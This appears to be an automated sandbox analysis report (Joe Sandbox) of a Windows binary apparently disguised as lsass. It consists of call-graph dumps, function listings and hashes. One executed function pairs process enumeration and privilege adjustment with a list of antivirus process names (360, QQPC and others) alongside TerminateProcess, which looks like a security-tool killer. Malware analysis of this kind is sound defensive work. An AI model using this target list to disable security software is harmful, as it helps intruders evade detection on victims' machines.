__free_lconv_num HeapFree 7121->7122 7122->7120 8020 140adfc5560 8021 140adfc5ef8 __free_lconv_num HeapFree 8020->8021 8022 140adfc5570 8021->8022 8023 140adfc5ef8 __free_lconv_num HeapFree 8022->8023 8024 140adfc5584 8023->8024 8025 140adfc5ef8 __free_lconv_num HeapFree 8024->8025 8026 140adfc5598 8025->8026 8027 140adfc5ef8 __free_lconv_num HeapFree 8026->8027 8028 140adfc55ac 8027->8028 7794 140adfcf1e0 7795 140adfcf209 7794->7795 7796 140adfcf221 7794->7796 7798 140adfc5e40 wprintf HeapFree 7795->7798 7797 140adfcf29b 7796->7797 7802 140adfcf252 7796->7802 7799 140adfc5e40 wprintf HeapFree 7797->7799 7800 140adfcf20e 7798->7800 7801 140adfcf2a0 7799->7801 7803 140adfc5e60 _set_errno_from_matherr HeapFree 7800->7803 7805 140adfc5e60 _set_errno_from_matherr HeapFree 7801->7805 7808 140adfcf27f 7802->7808 7809 140adfcf26a 7802->7809 7804 140adfcf216 7803->7804 7806 140adfcf2a8 7805->7806 7807 140adfc5d40 _invalid_parameter_noinfo HeapFree 7806->7807 7807->7804 7814 140adfcf2d0 7808->7814 7810 140adfc5e60 _set_errno_from_matherr HeapFree 7809->7810 7812 140adfcf26f 7810->7812 7813 140adfc5e40 wprintf HeapFree 7812->7813 7813->7804 7815 140adfcbb8c wprintf HeapFree 7814->7815 7816 140adfcf2ef 7815->7816 7817 140adfcf2f5 7816->7817 7818 140adfcf306 try_get_function wprintf 7816->7818 7819 140adfc5e60 _set_errno_from_matherr HeapFree 7817->7819 7820 140adfc5df0 wprintf HeapFree 7818->7820 7821 140adfcf2fa 7818->7821 7819->7821 7820->7821 7821->7804 8029 140adfce560 8030 140adfce58d 8029->8030 8031 140adfc5e60 _set_errno_from_matherr HeapFree 8030->8031 8036 140adfce5a2 8030->8036 8032 140adfce597 8031->8032 8033 140adfc5d40 _invalid_parameter_noinfo HeapFree 8032->8033 8033->8036 8034 140adfd0ba0 _handle_error 4 API calls 8035 140adfce90f 8034->8035 8036->8034 7123 140adfcef1c 7126 140adfc9d84 7123->7126 7127 140adfc9dd6 7126->7127 7128 140adfc9d91 7126->7128 7132 140adfc78c4 7128->7132 7133 140adfc78d5 _invalid_parameter_noinfo 7132->7133 7134 140adfc78e2 7133->7134 7135 140adfc5e80 _invalid_parameter_noinfo HeapFree 7133->7135 7138 140adfc795c 7134->7138 7164 140adfc5aa0 7134->7164 7139 140adfc790c _invalid_parameter_noinfo 7135->7139 7146 140adfc9b08 7138->7146 7140 140adfc7948 7139->7140 7141 140adfc791a _invalid_parameter_noinfo 7139->7141 7142 140adfc755c _invalid_parameter_noinfo HeapFree 7140->7142 7143 140adfc5ef8 __free_lconv_num HeapFree 7141->7143 7144 140adfc7950 7142->7144 7143->7134 7145 140adfc5ef8 __free_lconv_num HeapFree 7144->7145 7145->7134 7219 140adfc9ccc 7146->7219 7148 140adfc9b31 7230 140adfc9814 7148->7230 7165 140adfc5aa9 wprintf 7164->7165 7166 140adfc5ab8 wprintf 7165->7166 7170 140adfca57c 7165->7170 7168 140adfc5aeb wprintf 7166->7168 7186 140adfc5b2c 7166->7186 7171 140adfca5a4 7170->7171 7178 140adfca5c5 7170->7178 7172 140adfc796c _invalid_parameter_noinfo HeapFree 7171->7172 7174 140adfca5b8 7171->7174 7171->7178 7172->7174 7173 140adfca602 7173->7166 7174->7173 7175 140adfca643 7174->7175 7174->7178 7176 140adfc5e60 _set_errno_from_matherr HeapFree 7175->7176 7177 140adfca648 7176->7177 7180 140adfc5d40 _invalid_parameter_noinfo HeapFree 7177->7180 7179 140adfca7ce wprintf 7178->7179 7184 140adfca70c 7178->7184 7194 140adfc77f0 7178->7194 7180->7173 7183 140adfc77f0 wprintf 9 API calls 7183->7184 7185 140adfc77f0 9 API calls wprintf 7184->7185 7185->7184 7187 140adfc5b66 __scrt_fastfail 7186->7187 7188 140adfc5b8e RtlCaptureContext RtlLookupFunctionEntry 7187->7188 7189 140adfc5bfe IsDebuggerPresent 7188->7189 7190 140adfc5bc8 RtlVirtualUnwind 7188->7190 7191 140adfc5c41 __scrt_fastfail 7189->7191 7190->7189 7208 140adfd0ba0 7191->7208 7193 140adfc5c6f 7193->7168 7195 140adfc7805 _invalid_parameter_noinfo try_get_function 7194->7195 7196 140adfc5e80 _invalid_parameter_noinfo HeapFree 7195->7196 7197 140adfc781f _invalid_parameter_noinfo 7195->7197 7200 140adfc784d _invalid_parameter_noinfo 7196->7200 7198 140adfc78ae 7197->7198 7199 140adfc5aa0 wprintf 9 API calls 7197->7199 7198->7183 7201 140adfc78c3 7199->7201 7202 140adfc7889 7200->7202 7203 140adfc785b _invalid_parameter_noinfo 7200->7203 7205 140adfc755c _invalid_parameter_noinfo HeapFree 7202->7205 7204 140adfc5ef8 __free_lconv_num HeapFree 7203->7204 7204->7197 7206 140adfc7891 7205->7206 7207 140adfc5ef8 __free_lconv_num HeapFree 7206->7207 7207->7197 7209 140adfd0baa 7208->7209 7210 140adfd0bf8 IsProcessorFeaturePresent 7209->7210 7211 140adfd0bb6 7209->7211 7212 140adfd0c0f 7210->7212 7211->7193 7215 140adfd0dec RtlCaptureContext 7212->7215 7214 140adfd0c22 7214->7193 7216 140adfd0e06 RtlLookupFunctionEntry 7215->7216 7217 140adfd0e1c RtlVirtualUnwind 7216->7217 7218 140adfd0e55 7216->7218 7217->7216 7217->7218 7218->7214 7220 140adfc9cef 7219->7220 7222 140adfc9cf9 7220->7222 7225 140adfc5ef8 __free_lconv_num HeapFree 7220->7225 7221 140adfc9d6b 7221->7148 7222->7221 7223 140adfc5aa0 wprintf 9 API calls 7222->7223 7224 140adfc9d83 7223->7224 7226 140adfc9dd6 7224->7226 7227 140adfc78c4 9 API calls 7224->7227 7225->7222 7226->7148 7228 140adfc9dc0 7227->7228 7229 140adfc9b08 17 API calls 7228->7229 7229->7226 7237 140adfc33d8 7230->7237 7233 140adfc9834 GetOEMCP 7235 140adfc985b 7233->7235 7234 140adfc9846 7234->7235 7236 140adfc984b GetACP 7234->7236 7236->7235 7238 140adfc33fc 7237->7238 7239 140adfc33f7 7237->7239 7238->7239 7240 140adfc77f0 wprintf 9 API calls 7238->7240 7239->7233 7239->7234 7241 140adfc3417 7240->7241 7245 140adfc7a98 7241->7245 7246 140adfc7aad 7245->7246 7247 140adfc343a 7245->7247 7246->7247 7253 140adfcc5a0 7246->7253 7249 140adfc7acc 7247->7249 7250 140adfc7af4 7249->7250 7251 140adfc7ae1 7249->7251 7250->7239 7251->7250 7261 140adfc9de4 7251->7261 7254 140adfc77f0 wprintf 9 API calls 7253->7254 7255 140adfcc5af 7254->7255 7256 140adfcc5fa 7255->7256 7257 140adfcc610 wprintf HeapFree 7255->7257 7256->7247 7258 140adfcc5e8 7257->7258 7258->7256 7259 140adfc5aa0 wprintf 9 API calls 7258->7259 7260 140adfcc60d 7259->7260 7262 140adfc77f0 wprintf 9 API calls 7261->7262 7263 140adfc9ded 7262->7263 7857 140adfc2f98 7858 140adfc2fc2 7857->7858 7859 140adfc5e80 _invalid_parameter_noinfo HeapFree 7858->7859 7860 140adfc2fe1 7859->7860 7861 140adfc5ef8 __free_lconv_num HeapFree 7860->7861 7862 140adfc2fef 7861->7862 7863 140adfc5e80 _invalid_parameter_noinfo HeapFree 7862->7863 7866 140adfc3019 7862->7866 7865 140adfc300b 7863->7865 7864 140adfc62c8 InitializeCriticalSectionAndSpinCount 7864->7866 7867 140adfc5ef8 __free_lconv_num HeapFree 7865->7867 7866->7864 7868 140adfc3022 7866->7868 7867->7866 7822 140adfc6dd4 7823 140adfc6dfc 7822->7823 7824 140adfc6e0a 7822->7824 7823->7824 7825 140adfc33d8 wprintf 9 API calls 7823->7825 7826 140adfc6e26 7825->7826 7827 140adfc6e34 7826->7827 7828 140adfc6e56 7826->7828 7838 140adfcc000 7827->7838 7828->7824 7841 140adfcbc04 7828->7841 7832 140adfc6eec 7833 140adfca170 wprintf MultiByteToWideChar 7832->7833 7837 140adfc6ecf 7833->7837 7834 140adfc6e9a 7834->7837 7844 140adfca170 7834->7844 7835 140adfc5e60 _set_errno_from_matherr HeapFree 7835->7824 7837->7824 7837->7835 7848 140adfcf3d8 7838->7848 7842 140adfc33d8 wprintf 9 API calls 7841->7842 7843 140adfc6e96 7842->7843 7843->7832 7843->7834 7845 140adfca178 MultiByteToWideChar 7844->7845 7847 140adfd21c8 7845->7847 7850 140adfcf435 7848->7850 7853 140adfcf441 7848->7853 7849 140adfd0ba0 _handle_error 4 API calls 7852 140adfcc013 7849->7852 7850->7849 7851 140adfc5e60 _set_errno_from_matherr HeapFree 7851->7850 7852->7824 7853->7850 7853->7851 8037 140adfc4b53 8038 140adfc563c 9 API calls 8037->8038 8039 140adfc4b58 8038->8039 7264 140adfc30cc 7265 140adfc30d7 __scrt_uninitialize_crt 7264->7265 7273 140adfc64d0 7265->7273 7267 140adfc30dc 7279 140adfc6830 7267->7279 7270 140adfc310d 7271 140adfc5ef8 __free_lconv_num HeapFree 7270->7271 7272 140adfc3119 7271->7272 7278 140adfc64e9 7273->7278 7274 140adfc6568 7274->7267 7275 140adfc6533 DeleteCriticalSection 7277 140adfc5ef8 __free_lconv_num HeapFree 7275->7277 7277->7278 7278->7274 7278->7275 7283 140adfcab28 7278->7283 7280 140adfc30ee DeleteCriticalSection 7279->7280 7281 140adfc6843 7279->7281 7280->7267 7280->7270 7281->7280 7282 140adfc5ef8 __free_lconv_num HeapFree 7281->7282 7282->7280 7284 140adfcab3f 7283->7284 7287 140adfcab5d 7283->7287 7285 140adfc5e60 _set_errno_from_matherr HeapFree 7284->7285 7286 140adfcab44 7285->7286 7288 140adfc5d40 _invalid_parameter_noinfo HeapFree 7286->7288 7290 140adfcab4f 7287->7290 7291 140adfcaaa4 7287->7291 7288->7290 7290->7278 7292 140adfcaacb 7291->7292 7293 140adfcaab6 7291->7293 7305 140adfcaac6 7292->7305 7307 140adfc6760 7292->7307 7294 140adfc5e60 _set_errno_from_matherr HeapFree 7293->7294 7295 140adfcaabb 7294->7295 7297 140adfc5d40 _invalid_parameter_noinfo HeapFree 7295->7297 7297->7305 7299 140adfc6830 HeapFree 7300 140adfcaae7 7299->7300 7313 140adfc875c 7300->7313 7305->7290 7306 140adfc5ef8 __free_lconv_num HeapFree 7306->7305 7308 140adfc677d 7307->7308 7312 140adfc67ab 7307->7312 7309 140adfc875c wprintf HeapFree 7308->7309 7308->7312 7310 140adfc679e 7309->7310 7334 140adfcb518 7310->7334 7312->7299 7314 140adfc8765 7313->7314 7315 140adfc8775 7313->7315 7316 140adfc5e60 _set_errno_from_matherr HeapFree 7314->7316 7319 140adfcf060 7315->7319 7317 140adfc876a 7316->7317 7318 140adfc5d40 _invalid_parameter_noinfo HeapFree 7317->7318 7318->7315 7320 140adfcf070 7319->7320 7322 140adfcf085 7319->7322 7321 140adfc5e40 wprintf HeapFree 7320->7321 7325 140adfcf075 7321->7325 7323 140adfcf0e1 7322->7323 7326 140adfcf0b4 7322->7326 7324 140adfc5e40 wprintf HeapFree 7323->7324 7327 140adfcf0e6 7324->7327 7328 140adfc5e60 _set_errno_from_matherr HeapFree 7325->7328 7463 140adfcefec 7326->7463 7330 140adfc5e60 _set_errno_from_matherr HeapFree 7327->7330 7331 140adfcaaf6 7328->7331 7332 140adfcf0ee 7330->7332 7331->7305 7331->7306 7333 140adfc5d40 _invalid_parameter_noinfo HeapFree 7332->7333 7333->7331 7335 140adfcb559 7334->7335 7336 140adfcb541 7334->7336 7338 140adfcb5d0 7335->7338 7342 140adfcb58a 7335->7342 7354 140adfc5e40 7336->7354 7340 140adfc5e40 wprintf HeapFree 7338->7340 7343 140adfcb5d5 7340->7343 7341 140adfc5e60 _set_errno_from_matherr HeapFree 7351 140adfcb54e 7341->7351 7346 140adfcb5b6 7342->7346 7347 140adfcb5a1 7342->7347 7344 140adfc5e60 _set_errno_from_matherr HeapFree 7343->7344 7345 140adfcb5dd 7344->7345 7348 140adfc5d40 _invalid_parameter_noinfo HeapFree 7345->7348 7357 140adfcb604 7346->7357 7350 140adfc5e60 _set_errno_from_matherr HeapFree 7347->7350 7348->7351 7352 140adfcb5a6 7350->7352 7351->7312 7353 140adfc5e40 wprintf HeapFree 7352->7353 7353->7351 7355 140adfc796c _invalid_parameter_noinfo HeapFree 7354->7355 7356 140adfc5e49 7355->7356 7356->7341 7358 140adfcb62d 7357->7358 7393 140adfcb64a 7357->7393 7359 140adfcb632 7358->7359 7362 140adfcb683 7358->7362 7360 140adfc5e40 wprintf HeapFree 7359->7360 7363 140adfcb637 7360->7363 7361 140adfcb699 7406 140adfce090 7361->7406 7362->7361 7397 140adfcf374 7362->7397 7366 140adfc5e60 _set_errno_from_matherr HeapFree 7363->7366 7368 140adfcb63f 7366->7368 7370 140adfc5d40 _invalid_parameter_noinfo HeapFree 7368->7370 7369 140adfcb7b2 7371 140adfcb7cd 7369->7371 7372 140adfcb7ff 7369->7372 7394 140adfcb784 try_get_function wprintf 7369->7394 7370->7393 7374 140adfcb7eb 7371->7374 7375 140adfcb7d2 7371->7375 7433 140adfcb188 7372->7433 7373 140adfc77f0 wprintf 9 API calls 7376 140adfcb6ca 7373->7376 7427 140adfcb3a8 7374->7427 7375->7394 7423 140adfcb28c 7375->7423 7376->7369 7379 140adfcb6f0 GetConsoleMode 7376->7379 7379->7369 7381 140adfcb712 7379->7381 7383 140adfcb794 7381->7383 7395 140adfcb717 7381->7395 7382 140adfcb888 7387 140adfc5e60 _set_errno_from_matherr HeapFree 7382->7387 7382->7393 7414 140adfcacac GetConsoleCP 7383->7414 7384 140adfcb878 7437 140adfc5df0 7384->7437 7389 140adfcb8aa 7387->7389 7388 140adfc5e60 _set_errno_from_matherr HeapFree 7390 140adfcb86d 7388->7390 7391 140adfc5e40 wprintf HeapFree 7389->7391 7392 140adfc5e40 wprintf HeapFree 7390->7392 7391->7393 7392->7384 7393->7351 7394->7382 7394->7384 7394->7388 7394->7393 7395->7394 7396 140adfcf37c CreateFileW CloseHandle CreateFileW wprintf 7395->7396 7396->7395 7398 140adfcf2d0 7397->7398 7442 140adfcbb8c 7398->7442 7401 140adfcf2f5 7402 140adfc5e60 _set_errno_from_matherr HeapFree 7401->7402 7404 140adfcf2fa 7402->7404 7403 140adfcf306 try_get_function wprintf 7403->7404 7405 140adfc5df0 wprintf HeapFree 7403->7405 7404->7361 7405->7404 7407 140adfce099 7406->7407 7409 140adfce0a6 7406->7409 7408 140adfc5e60 _set_errno_from_matherr HeapFree 7407->7408 7410 140adfcb6a7 7408->7410 7409->7410 7411 140adfc5e60 _set_errno_from_matherr HeapFree 7409->7411 7410->7369 7410->7373 7412 140adfce0dd 7411->7412 7413 140adfc5d40 _invalid_parameter_noinfo HeapFree 7412->7413 7413->7410 7415 140adfc33d8 wprintf 9 API calls 7414->7415 7421 140adfcad30 memcpy_s wprintf 7415->7421 7416 140adfd0ba0 _handle_error 4 API calls 7418 140adfcb0c1 7416->7418 7418->7394 7420 140adfcc03c 5 API calls wprintf 7420->7421 7421->7420 7422 140adfcb054 try_get_function 7421->7422 7454 140adfca840 7421->7454 7459 140adfca1cc 7421->7459 7422->7416 7426 140adfcb2a4 try_get_function wprintf 7423->7426 7424 140adfd0ba0 _handle_error 4 API calls 7425 140adfcb38d 7424->7425 7425->7394 7426->7424 7430 140adfcb3c4 wprintf 7427->7430 7428 140adfd0ba0 _handle_error 4 API calls 7429 140adfcb4fc 7428->7429 7429->7394 7431 140adfca1cc wprintf WideCharToMultiByte 7430->7431 7432 140adfcb4e1 try_get_function 7430->7432 7431->7430 7432->7428 7436 140adfcb1a0 try_get_function wprintf 7433->7436 7434 140adfd0ba0 _handle_error 4 API calls 7435 140adfcb272 7434->7435 7435->7394 7436->7434 7438 140adfc796c _invalid_parameter_noinfo HeapFree 7437->7438 7439 140adfc5e01 7438->7439 7440 140adfc796c _invalid_parameter_noinfo HeapFree 7439->7440 7441 140adfc5e1a __free_lconv_num 7440->7441 7441->7382 7443 140adfcbb95 7442->7443 7444 140adfcbbaa 7442->7444 7445 140adfc5e40 wprintf HeapFree 7443->7445 7446 140adfc5e40 wprintf HeapFree 7444->7446 7451 140adfcbba2 7444->7451 7447 140adfcbb9a 7445->7447 7448 140adfcbbe5 7446->7448 7449 140adfc5e60 _set_errno_from_matherr HeapFree 7447->7449 7450 140adfc5e60 _set_errno_from_matherr HeapFree 7448->7450 7449->7451 7452 140adfcbbed 7450->7452 7451->7401 7451->7403 7453 140adfc5d40 _invalid_parameter_noinfo HeapFree 7452->7453 7453->7451 7455 140adfc77f0 wprintf 9 API calls 7454->7455 7456 140adfca849 7455->7456 7457 140adfc7a98 wprintf 9 API calls 7456->7457 7458 140adfca862 7457->7458 7458->7421 7460 140adfca1e8 WideCharToMultiByte 7459->7460 7462 140adfd2038 7460->7462 7464 140adfcf008 7463->7464 7465 140adfcf03b 7464->7465 7466 140adfcf032 7464->7466 7468 140adfc5e60 _set_errno_from_matherr HeapFree 7465->7468 7470 140adfcf104 7466->7470 7469 140adfcf037 7468->7469 7469->7331 7471 140adfcbb8c wprintf HeapFree 7470->7471 7474 140adfcf118 7471->7474 7472 140adfcf11e try_get_function 7484 140adfcbad0 7472->7484 7474->7472 7476 140adfcbb8c wprintf HeapFree 7474->7476 7483 140adfcf15b 7474->7483 7478 140adfcf14e 7476->7478 7477 140adfcbb8c wprintf HeapFree 7479 140adfcf167 CloseHandle 7477->7479 7481 140adfcbb8c wprintf HeapFree 7478->7481 7479->7472 7480 140adfc5df0 wprintf HeapFree 7482 140adfcf1af 7480->7482 7481->7483 7482->7469 7483->7472 7483->7477 7485 140adfcbb5e 7484->7485 7487 140adfcbaec 7484->7487 7486 140adfc5e60 _set_errno_from_matherr HeapFree 7485->7486 7488 140adfcbb63 7486->7488 7487->7485 7492 140adfcbb1f 7487->7492 7489 140adfc5e40 wprintf HeapFree 7488->7489 7490 140adfcbb50 7489->7490 7490->7480 7490->7482 7491 140adfcbb48 SetStdHandle 7491->7490 7492->7490 7492->7491 7493 140adfc54c8 7496 140adfc5294 7493->7496 7503 140adfc525c 7496->7503 7504 140adfc526c 7503->7504 7505 140adfc5271 7503->7505 7506 140adfc5218 HeapFree 7504->7506 7507 140adfc5278 7505->7507 7506->7505 7508 140adfc528d 7507->7508 7509 140adfc5288 7507->7509 7511 140adfc5218 7508->7511 7510 140adfc5218 HeapFree 7509->7510 7510->7508 7512 140adfc521d 7511->7512 7513 140adfc524e 7511->7513 7514 140adfc5246 7512->7514 7515 140adfc5ef8 __free_lconv_num HeapFree 7512->7515 7516 140adfc5ef8 __free_lconv_num HeapFree 7514->7516 7515->7512 7516->7513 8040 140adfca148 GetCommandLineA GetCommandLineW 6940 140adfc0286 6941 140adfc02ef CreateToolhelp32Snapshot 6940->6941 6942 140adfc108a 6941->6942 6943 140adfc1023 __scrt_fastfail 6941->6943 6944 140adfc103d Process32First 6943->6944 6946 140adfc104c 6944->6946 6945 140adfc1081 CloseHandle 6945->6942 6946->6945 6947 140adfc109d CloseHandle 6946->6947 6948 140adfc1073 Process32Next 6946->6948 6947->6942 6948->6946 7775 140adfca400 GetProcessHeap 7595 140adfcee80 7596 140adfcee88 7595->7596 7597 140adfcee9d 7596->7597 7598 140adfceeb6 7596->7598 7599 140adfc5e60 _set_errno_from_matherr HeapFree 7597->7599 7602 140adfc33d8 wprintf 9 API calls 7598->7602 7603 140adfceead 7598->7603 7600 140adfceea2 7599->7600 7601 140adfc5d40 _invalid_parameter_noinfo HeapFree 7600->7601 7601->7603 7602->7603 8041 140adfd1143 __scrt_dllmain_exception_filter

                                                                                                              Executed Functions

                                                                                                              Function 00000140ADFC0286 Relevance: 8.6, APIs: 5, Instructions: 1060COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d18c40656cae29c548f7271634e43ccf2789769c4f329273b938c7959e451a53
                                                                                                              • Instruction ID: 06a783a180ab62c277cd57d378a31a60df45147ecf15f47377697f87be38cea8
                                                                                                              • Opcode Fuzzy Hash: d18c40656cae29c548f7271634e43ccf2789769c4f329273b938c7959e451a53
                                                                                                              • Instruction Fuzzy Hash: 3311E7322287C847EF67972399143DBB7A3AF8C790F5882219759436E6DA3CC826D700
                                                                                                              Function 00000140ADFC10AC Relevance: 49.1, APIs: 4, Strings: 24, Instructions: 110sleeplibraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Processwprintf$AddressAdjustErrorHandleLastModuleOpenPrivilegeProcSleepTerminate
                                                                                                              • String ID: 360LogCenter.exe$360Safe.exe$360Tray.exe$360huabao.exe$360rp.exe$360rps.exe$360sd.exe$360sdupd.exe$360speedld.exe$360tray.exe$Calc.exe$DSMain.exe$DumpUper.exe$EXCEL.exe$FireFox.exe$LiveUpdate360.exe$NSIS.exe$QMDL.exe$QQPCRTP.exe$QQPCTray.exe$RtlAdjustPrivilege$ZhuDongFangYu.exe$ntdll$xdict.exe
                                                                                                              • API String ID: 5669555-1361469849
                                                                                                              • Opcode ID: 24d51f0a703d8914dcecad46e80c6b974424f7a363abdc667e241b1ccd0e6945
                                                                                                              • Instruction ID: 144e8786a4b836ed3e5618c3f3ec10ad9bbd8b10f3494fe4011c7b990bea52e8
                                                                                                              • Opcode Fuzzy Hash: 24d51f0a703d8914dcecad46e80c6b974424f7a363abdc667e241b1ccd0e6945
                                                                                                              • Instruction Fuzzy Hash: 4551ED3462074843EE56B772D8653DB3253BF98345FA40625A64A871FBDE39CD37A380

                                                                                                              Non-executed Functions

                                                                                                              Function 00000140ADFCACAC Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 325fileCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 655 140adfcacac-140adfcad4f GetConsoleCP call 140adfc33d8 658 140adfcb08f 655->658 659 140adfcad55-140adfcad5f 655->659 660 140adfcb093 658->660 661 140adfcad63-140adfcad7b 659->661 662 140adfcb095-140adfcb09a 660->662 663 140adfcb0a1-140adfcb0db call 140adfd0ba0 660->663 664 140adfcad81-140adfcad96 661->664 665 140adfcaf03-140adfcaf1a 661->665 662->663 669 140adfcad9a-140adfcad9f 664->669 666 140adfcaf1c-140adfcaf3b 665->666 667 140adfcaf3d-140adfcaf4b call 140adfca840 665->667 670 140adfcaf65-140adfcaf72 call 140adfc6f50 666->670 679 140adfcaf4d-140adfcaf53 667->679 680 140adfcaf5f 667->680 673 140adfcadac-140adfcadaf 669->673 674 140adfcada1-140adfcadaa 669->674 691 140adfcb16c-140adfcb170 670->691 692 140adfcaf78-140adfcafaf call 140adfca1cc 670->692 677 140adfcaea4-140adfcaebf 673->677 678 140adfcadb5-140adfcade2 673->678 674->669 674->673 682 140adfcb0dc-140adfcb0e2 677->682 683 140adfcaec5-140adfcaef5 call 140adfcc03c 677->683 684 140adfcade8-140adfcadee 678->684 685 140adfcb054-140adfcb05a 678->685 686 140adfcaf59-140adfcaf5d 679->686 687 140adfcb132-140adfcb15e 679->687 690 140adfcaf62 680->690 688 140adfcb0e4-140adfcb0fe 682->688 689 140adfcb123-140adfcb12d 682->689 683->691 710 140adfcaefb-140adfcaf01 683->710 696 140adfcae14-140adfcae17 684->696 697 140adfcadf0-140adfcadf7 684->697 693 140adfcb05c-140adfcb05f 685->693 694 140adfcb089-140adfcb08c 685->694 686->690 687->660 700 140adfcb101-140adfcb121 688->700 689->660 690->670 691->660 715 140adfcb17e-140adfcb181 692->715 716 140adfcafb5-140adfcafd5 call 140adfd21f0 692->716 702 140adfcb066-140adfcb084 693->702 694->658 698 140adfcae2e-140adfcae34 696->698 699 140adfcae19-140adfcae2b call 140adfc2ac0 696->699 704 140adfcadfb-140adfcae0f 697->704 706 140adfcae55-140adfcae8b call 140adfcc03c 698->706 707 140adfcae36 698->707 699->698 700->689 700->700 702->702 709 140adfcb086 702->709 704->704 711 140adfcae11 704->711 706->691 720 140adfcae91-140adfcae9f 706->720 713 140adfcae3d-140adfcae53 707->713 709->694 710->692 711->696 713->706 713->713 715->660 721 140adfcafdb-140adfcafef 716->721 722 140adfcb175-140adfcb17b call 140adfd2008 716->722 720->692 721->658 724 140adfcaff5-140adfcaffa 721->724 722->715 726 140adfcaffc-140adfcb027 call 140adfd21f0 724->726 727 140adfcb040-140adfcb046 724->727 731 140adfcb02d-140adfcb032 726->731 732 140adfcb163-140adfcb169 call 140adfd2008 726->732 727->658 729 140adfcb048-140adfcb04f 727->729 729->661 731->658 733 140adfcb034-140adfcb03d 731->733 732->691 733->727
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorFileLastWrite$Console
                                                                                                              • String ID: MZER
                                                                                                              • API String ID: 786612050-2424380061
                                                                                                              • Opcode ID: 5fc4feed90efd471fb5ce59cf83c65739393e50eb3ef152f50aa3b5421ebb0d5
                                                                                                              • Instruction ID: c74ead08e62e1a9c33215e75819414dc40a9706ca957abf03945b31a54bdfef6
                                                                                                              • Opcode Fuzzy Hash: 5fc4feed90efd471fb5ce59cf83c65739393e50eb3ef152f50aa3b5421ebb0d5
                                                                                                              • Instruction Fuzzy Hash: A8E1EF76724B889AE702CF76D4442DE77B3FB49788F640116CB8A47BA9DA34C16BD300
                                                                                                              Function 00000140ADFC5B2C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 1239891234-0
                                                                                                              • Opcode ID: 0ad423fde92f3f6014d0d5a5c5ca5ddf7528281e5dff3197ed98a148e2b121e3
                                                                                                              • Instruction ID: 0cade24ae5590496a30be0b4c00ed4af76a526760aa7f1831f94413360d2efe4
                                                                                                              • Opcode Fuzzy Hash: 0ad423fde92f3f6014d0d5a5c5ca5ddf7528281e5dff3197ed98a148e2b121e3
                                                                                                              • Instruction Fuzzy Hash: 59313D36214B8486DB61CF26E8443DE73A7FB88758F640125EB9D43BA9DF38C556CB40
                                                                                                              Function 00000140ADFC7B00 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 248COMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1011 140adfc7b00-140adfc7b57 call 140adfc33d8 1014 140adfc7b6e-140adfc7b83 1011->1014 1015 140adfc7b59-140adfc7b69 call 140adfc5e60 call 140adfc5d40 1011->1015 1016 140adfc7bfb-140adfc7c03 1014->1016 1017 140adfc7b85-140adfc7bc0 call 140adfc7e70 1014->1017 1033 140adfc7e3a-140adfc7e3f 1015->1033 1020 140adfc7c0d-140adfc7c49 1016->1020 1021 140adfc7c05-140adfc7c0a 1016->1021 1029 140adfc7bca-140adfc7bda call 140adfd0ec4 1017->1029 1030 140adfc7bc2-140adfc7bc5 1017->1030 1025 140adfc7c4b-140adfc7c60 1020->1025 1026 140adfc7c62 1020->1026 1021->1020 1027 140adfc7c65-140adfc7c6b 1025->1027 1026->1027 1031 140adfc7c6d-140adfc7c70 1027->1031 1032 140adfc7c72-140adfc7c81 1027->1032 1041 140adfc7e37 1029->1041 1042 140adfc7be0-140adfc7bf6 1029->1042 1030->1033 1035 140adfc7c83-140adfc7c89 1031->1035 1032->1035 1036 140adfc7e4d-140adfc7e6c 1033->1036 1037 140adfc7e41-140adfc7e46 1033->1037 1039 140adfc7d1c-140adfc7d1e 1035->1039 1040 140adfc7c8f-140adfc7c93 1035->1040 1037->1036 1043 140adfc7d39-140adfc7d63 1039->1043 1044 140adfc7d20-140adfc7d33 call 140adfc1f20 1039->1044 1045 140adfc7c9d-140adfc7c9f 1040->1045 1041->1033 1042->1041 1049 140adfc7d6b-140adfc7d8a 1043->1049 1050 140adfc7d65-140adfc7d68 1043->1050 1044->1043 1047 140adfc7ccf-140adfc7cd3 1045->1047 1048 140adfc7ca1-140adfc7cb8 1045->1048 1047->1039 1054 140adfc7cd5-140adfc7ce8 1047->1054 1052 